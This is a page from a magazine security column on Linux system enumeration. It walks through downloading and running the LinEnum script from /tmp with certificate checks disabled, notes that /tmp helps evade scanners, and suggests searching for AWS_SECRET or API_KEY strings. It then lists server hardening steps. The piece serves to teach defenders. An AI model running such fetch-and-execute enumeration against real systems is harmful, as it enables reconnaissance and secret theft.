http://www.phparch.com \ August 2019 \ 33System Enumeration
Security Corner
Once you execute this command, you’re logged in as nobody
on a pristine Alpine system as in Figure 1.
Now, we don our black hat and execute a simple, one-line
command to both install and execute LinEnum against the
server:cd /tmp && wget --no-check-certificate \
https://raw.githubusercontent.com/rebootuser/LinEnum
/master/LinEnum.sh && /bin/sh LinEnum.shOn most systems, everyone—including nobody—has write
access to the /tmp directory. This directory gives us a good
place to drop our enumeration script where it likely won’t be
found by a scanner. In many situations, the /tmp directory is
purged on a schedule anyway, so we don’t even need to clean
up afterward! Since we know wget exists on this machine, I’m
executing it directly with the --no-check-certificate flag to
skip any SSL/TLS validation with the host from which we’re
pulling the script. Finally, we invoke the script with it’s broad,
default (empty) parameters.
The script itself, once it’s on the machine, runs a wide variety
of scans against the system. What environment variables^4 are
exposed? Which users are available? Are their passwords
visible? Can we read their home directory? What network
interfaces are available?
An optional -t flag runs more thorough tests, and once you
know how a system is configured, you can drill even deeper
with keyword searches against exposed files in the system—
perhaps searching for strings like AWS_SECRET or API_KEY.
System enumeration is a powerful way for an attacker to
exfiltrate data from your system with minimal effort; all we’ve
done is log in and run a single command!System Protections and Continuous Awareness
Unfortunately, there’s little you can do that you’re not
already doing to protect yourself from LinEnum and tools
like it. If someone’s already inside your machine, and they can
run a script, then they will run it and do whatever they can.
That little you can do, though, is powerful:
- Disable the root user and ensure any interactive users
are logging in under individual accounts for logging and
tracking purposes. - Ensure every application runs as an unprivileged user.
- Block logins to any account that doesn’t need a human
to log in—explicitly whitelist interactive SSH users via
AllowUsers in sshd config^5. - Ensure every human user of your system is using a strong
SSH key to authenticate and disable password authentica-
tion entirely. - Log every authentication event—both success and fail-
ure—and monitor those logs for anomalies.
4 environment variables: https://phpa.me/security-corner-june-2019
5 via AllowUsers in sshd config: https://phpa.me/restrict-ssh-account- Implement application and system-level intrusion detec-
tion systems^6.
There’s a very good chance you’re already doing much, if
not all, of the above. That means your system features strong
protection and you can rest easy—so long as you and your
team stay on top of things. The landscape changes daily; it’s up
to you to understand what those changes entail and the way
they’ll be used as leverage against your system. Understanding
the tools and techniques an attacker uses to breach—and
once they’ve successfully breached—your system helps keep
you one step ahead.
Eric is a seasoned web developer experi-
enced with multiple languages and platforms.
He’s been working with PHP for more than a
decade and focuses his time on helping
developers get started and learn new skills
with their tech of choice. You can reach out
to him directly via Twitter: @EricMann6 intrusion detection systems:
https://phpa.me/security-corner-march-2019Figure 1Figure 2. LinEnum running in Alpine